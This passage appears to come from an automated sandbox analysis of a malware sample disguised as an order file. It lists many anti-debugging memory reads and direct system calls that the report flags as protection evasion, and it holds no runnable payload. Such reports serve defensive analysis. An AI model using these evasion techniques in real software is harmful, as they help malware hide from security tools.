        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF113 mov eax, dword ptr fs:[00000030h]3_2_351CF113
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF113 mov eax, dword ptr fs:[00000030h]3_2_351CF113
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF113 mov eax, dword ptr fs:[00000030h]3_2_351CF113
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF113 mov eax, dword ptr fs:[00000030h]3_2_351CF113
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CF113 mov eax, dword ptr fs:[00000030h]3_2_351CF113
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F510F mov eax, dword ptr fs:[00000030h]3_2_351F510F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D510D mov eax, dword ptr fs:[00000030h]3_2_351D510D
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525A130 mov eax, dword ptr fs:[00000030h]3_2_3525A130
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3528F13E mov eax, dword ptr fs:[00000030h]3_2_3528F13E
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35200118 mov eax, dword ptr fs:[00000030h]3_2_35200118
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520716D mov eax, dword ptr fs:[00000030h]3_2_3520716D
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3522717A mov eax, dword ptr fs:[00000030h]3_2_3522717A
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3522717A mov eax, dword ptr fs:[00000030h]3_2_3522717A
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CA147 mov eax, dword ptr fs:[00000030h]3_2_351CA147
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CA147 mov eax, dword ptr fs:[00000030h]3_2_351CA147
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CA147 mov eax, dword ptr fs:[00000030h]3_2_351CA147
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A5149 mov eax, dword ptr fs:[00000030h]3_2_352A5149
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D6179 mov eax, dword ptr fs:[00000030h]3_2_351D6179
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3526314A mov eax, dword ptr fs:[00000030h]3_2_3526314A
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3526314A mov eax, dword ptr fs:[00000030h]3_2_3526314A
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3526314A mov eax, dword ptr fs:[00000030h]3_2_3526314A
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3526314A mov eax, dword ptr fs:[00000030h]3_2_3526314A
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A3157 mov eax, dword ptr fs:[00000030h]3_2_352A3157
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A3157 mov eax, dword ptr fs:[00000030h]3_2_352A3157
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A3157 mov eax, dword ptr fs:[00000030h]3_2_352A3157
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520415F mov eax, dword ptr fs:[00000030h]3_2_3520415F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520E1A4 mov eax, dword ptr fs:[00000030h]3_2_3520E1A4
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520E1A4 mov eax, dword ptr fs:[00000030h]3_2_3520E1A4
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F9194 mov eax, dword ptr fs:[00000030h]3_2_351F9194
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352041BB mov ecx, dword ptr fs:[00000030h]3_2_352041BB
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352041BB mov eax, dword ptr fs:[00000030h]3_2_352041BB
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352041BB mov eax, dword ptr fs:[00000030h]3_2_352041BB
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A51B6 mov eax, dword ptr fs:[00000030h]3_2_352A51B6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D4180 mov eax, dword ptr fs:[00000030h]3_2_351D4180
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D4180 mov eax, dword ptr fs:[00000030h]3_2_351D4180
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D4180 mov eax, dword ptr fs:[00000030h]3_2_351D4180
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352031BE mov eax, dword ptr fs:[00000030h]3_2_352031BE
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352031BE mov eax, dword ptr fs:[00000030h]3_2_352031BE
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35211190 mov eax, dword ptr fs:[00000030h]3_2_35211190
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35211190 mov eax, dword ptr fs:[00000030h]3_2_35211190
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352981EE mov eax, dword ptr fs:[00000030h]3_2_352981EE
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352981EE mov eax, dword ptr fs:[00000030h]3_2_352981EE
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E01C0 mov eax, dword ptr fs:[00000030h]3_2_351E01C0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E01C0 mov eax, dword ptr fs:[00000030h]3_2_351E01C0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E51C0 mov eax, dword ptr fs:[00000030h]3_2_351E51C0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E51C0 mov eax, dword ptr fs:[00000030h]3_2_351E51C0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E51C0 mov eax, dword ptr fs:[00000030h]3_2_351E51C0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E51C0 mov eax, dword ptr fs:[00000030h]3_2_351E51C0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C91F0 mov eax, dword ptr fs:[00000030h]3_2_351C91F0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C91F0 mov eax, dword ptr fs:[00000030h]3_2_351C91F0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E01F1 mov eax, dword ptr fs:[00000030h]3_2_351E01F1
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E01F1 mov eax, dword ptr fs:[00000030h]3_2_351E01F1
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E01F1 mov eax, dword ptr fs:[00000030h]3_2_351E01F1
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FF1F0 mov eax, dword ptr fs:[00000030h]3_2_351FF1F0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FF1F0 mov eax, dword ptr fs:[00000030h]3_2_351FF1F0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C81EB mov eax, dword ptr fs:[00000030h]3_2_351C81EB
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D91E5 mov eax, dword ptr fs:[00000030h]3_2_351D91E5
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D91E5 mov eax, dword ptr fs:[00000030h]3_2_351D91E5
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DA1E3 mov eax, dword ptr fs:[00000030h]3_2_351DA1E3
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DA1E3 mov eax, dword ptr fs:[00000030h]3_2_351DA1E3
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DA1E3 mov eax, dword ptr fs:[00000030h]3_2_351DA1E3
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DA1E3 mov eax, dword ptr fs:[00000030h]3_2_351DA1E3
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DA1E3 mov eax, dword ptr fs:[00000030h]3_2_351DA1E3
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FB1E0 mov eax, dword ptr fs:[00000030h]3_2_351FB1E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FB1E0 mov eax, dword ptr fs:[00000030h]3_2_351FB1E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FB1E0 mov eax, dword ptr fs:[00000030h]3_2_351FB1E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FB1E0 mov eax, dword ptr fs:[00000030h]3_2_351FB1E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FB1E0 mov eax, dword ptr fs:[00000030h]3_2_351FB1E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FB1E0 mov eax, dword ptr fs:[00000030h]3_2_351FB1E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FB1E0 mov eax, dword ptr fs:[00000030h]3_2_351FB1E0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D8009 mov eax, dword ptr fs:[00000030h]3_2_351D8009
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F5004 mov eax, dword ptr fs:[00000030h]3_2_351F5004
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F5004 mov ecx, dword ptr fs:[00000030h]3_2_351F5004
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CD02D mov eax, dword ptr fs:[00000030h]3_2_351CD02D
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35279060 mov eax, dword ptr fs:[00000030h]3_2_35279060
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D1051 mov eax, dword ptr fs:[00000030h]3_2_351D1051
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D1051 mov eax, dword ptr fs:[00000030h]3_2_351D1051
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35200044 mov eax, dword ptr fs:[00000030h]3_2_35200044
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D6074 mov eax, dword ptr fs:[00000030h]3_2_351D6074
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D6074 mov eax, dword ptr fs:[00000030h]3_2_351D6074
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D7072 mov eax, dword ptr fs:[00000030h]3_2_351D7072
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A505B mov eax, dword ptr fs:[00000030h]3_2_352A505B
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F0A5 mov eax, dword ptr fs:[00000030h]3_2_3527F0A5
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F0A5 mov eax, dword ptr fs:[00000030h]3_2_3527F0A5
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F0A5 mov eax, dword ptr fs:[00000030h]3_2_3527F0A5
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F0A5 mov eax, dword ptr fs:[00000030h]3_2_3527F0A5
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F0A5 mov eax, dword ptr fs:[00000030h]3_2_3527F0A5
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F0A5 mov eax, dword ptr fs:[00000030h]3_2_3527F0A5
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3527F0A5 mov eax, dword ptr fs:[00000030h]3_2_3527F0A5
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352100A5 mov eax, dword ptr fs:[00000030h]3_2_352100A5
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3528B0AF mov eax, dword ptr fs:[00000030h]3_2_3528B0AF
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CC090 mov eax, dword ptr fs:[00000030h]3_2_351CC090
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CA093 mov ecx, dword ptr fs:[00000030h]3_2_351CA093
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A50B7 mov eax, dword ptr fs:[00000030h]3_2_352A50B7
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A4080 mov eax, dword ptr fs:[00000030h]3_2_352A4080
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A4080 mov eax, dword ptr fs:[00000030h]3_2_352A4080
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A4080 mov eax, dword ptr fs:[00000030h]3_2_352A4080
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A4080 mov eax, dword ptr fs:[00000030h]3_2_352A4080
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A4080 mov eax, dword ptr fs:[00000030h]3_2_352A4080
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A4080 mov eax, dword ptr fs:[00000030h]3_2_352A4080
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A4080 mov eax, dword ptr fs:[00000030h]3_2_352A4080
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CB0D6 mov eax, dword ptr fs:[00000030h]3_2_351CB0D6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CB0D6 mov eax, dword ptr fs:[00000030h]3_2_351CB0D6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CB0D6 mov eax, dword ptr fs:[00000030h]3_2_351CB0D6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CB0D6 mov eax, dword ptr fs:[00000030h]3_2_351CB0D6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351EB0D0 mov eax, dword ptr fs:[00000030h]3_2_351EB0D0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520D0F0 mov eax, dword ptr fs:[00000030h]3_2_3520D0F0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520D0F0 mov ecx, dword ptr fs:[00000030h]3_2_3520D0F0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C90F8 mov eax, dword ptr fs:[00000030h]3_2_351C90F8
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C90F8 mov eax, dword ptr fs:[00000030h]3_2_351C90F8
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C90F8 mov eax, dword ptr fs:[00000030h]3_2_351C90F8
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C90F8 mov eax, dword ptr fs:[00000030h]3_2_351C90F8
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CC0F6 mov eax, dword ptr fs:[00000030h]3_2_351CC0F6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35208322 mov eax, dword ptr fs:[00000030h]3_2_35208322
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35208322 mov eax, dword ptr fs:[00000030h]3_2_35208322
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35208322 mov eax, dword ptr fs:[00000030h]3_2_35208322
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351EE310 mov eax, dword ptr fs:[00000030h]3_2_351EE310
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351EE310 mov eax, dword ptr fs:[00000030h]3_2_351EE310
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351EE310 mov eax, dword ptr fs:[00000030h]3_2_351EE310
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352A3336 mov eax, dword ptr fs:[00000030h]3_2_352A3336
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C9303 mov eax, dword ptr fs:[00000030h]3_2_351C9303
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C9303 mov eax, dword ptr fs:[00000030h]3_2_351C9303
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3528F30A mov eax, dword ptr fs:[00000030h]3_2_3528F30A
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525330C mov eax, dword ptr fs:[00000030h]3_2_3525330C
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525330C mov eax, dword ptr fs:[00000030h]3_2_3525330C
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525330C mov eax, dword ptr fs:[00000030h]3_2_3525330C
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3525330C mov eax, dword ptr fs:[00000030h]3_2_3525330C
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F332D mov eax, dword ptr fs:[00000030h]3_2_351F332D
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CE328 mov eax, dword ptr fs:[00000030h]3_2_351CE328
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CE328 mov eax, dword ptr fs:[00000030h]3_2_351CE328
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351CE328 mov eax, dword ptr fs:[00000030h]3_2_351CE328
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520631F mov eax, dword ptr fs:[00000030h]3_2_3520631F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]3_2_3520E363
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]3_2_3520E363
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]3_2_3520E363
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]3_2_3520E363
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]3_2_3520E363
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]3_2_3520E363
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]3_2_3520E363
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]3_2_3520E363
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35250371 mov eax, dword ptr fs:[00000030h]3_2_35250371
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35250371 mov eax, dword ptr fs:[00000030h]3_2_35250371
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3524E372 mov eax, dword ptr fs:[00000030h]3_2_3524E372
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3524E372 mov eax, dword ptr fs:[00000030h]3_2_3524E372
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3524E372 mov eax, dword ptr fs:[00000030h]3_2_3524E372
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3524E372 mov eax, dword ptr fs:[00000030h]3_2_3524E372
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C8347 mov eax, dword ptr fs:[00000030h]3_2_351C8347
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C8347 mov eax, dword ptr fs:[00000030h]3_2_351C8347
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C8347 mov eax, dword ptr fs:[00000030h]3_2_351C8347
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F237A mov eax, dword ptr fs:[00000030h]3_2_351F237A
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]3_2_351DB360
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]3_2_351DB360
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]3_2_351DB360
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]3_2_351DB360
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]3_2_351DB360
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]3_2_351DB360
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FA390 mov eax, dword ptr fs:[00000030h]3_2_351FA390
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FA390 mov eax, dword ptr fs:[00000030h]3_2_351FA390
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FA390 mov eax, dword ptr fs:[00000030h]3_2_351FA390
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3524C3B0 mov eax, dword ptr fs:[00000030h]3_2_3524C3B0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D1380 mov eax, dword ptr fs:[00000030h]3_2_351D1380
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D1380 mov eax, dword ptr fs:[00000030h]3_2_351D1380
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D1380 mov eax, dword ptr fs:[00000030h]3_2_351D1380
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D1380 mov eax, dword ptr fs:[00000030h]3_2_351D1380

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtReadVirtualMemory: Direct from: 0x77E62DACJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtOpenFile: Direct from: 0x77E62CECJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtAllocateVirtualMemory: Direct from: 0x77E63BBCJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtQueryInformationToken: Direct from: 0x77E62BCCJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtNotifyChangeKey: Direct from: 0x77E63B4CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtSetInformationProcess: Direct from: 0x77E62B7CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtSetInformationThread: Direct from: 0x77E56319Jump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtReadFile: Direct from: 0x77E629FCJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtQuerySystemInformation: Direct from: 0x77E62D1CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtMapViewOfSection: Direct from: 0x77E62C3CJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeNtAllocateVirtualMemory: Direct from: 0x77E62B1CJump to behavior
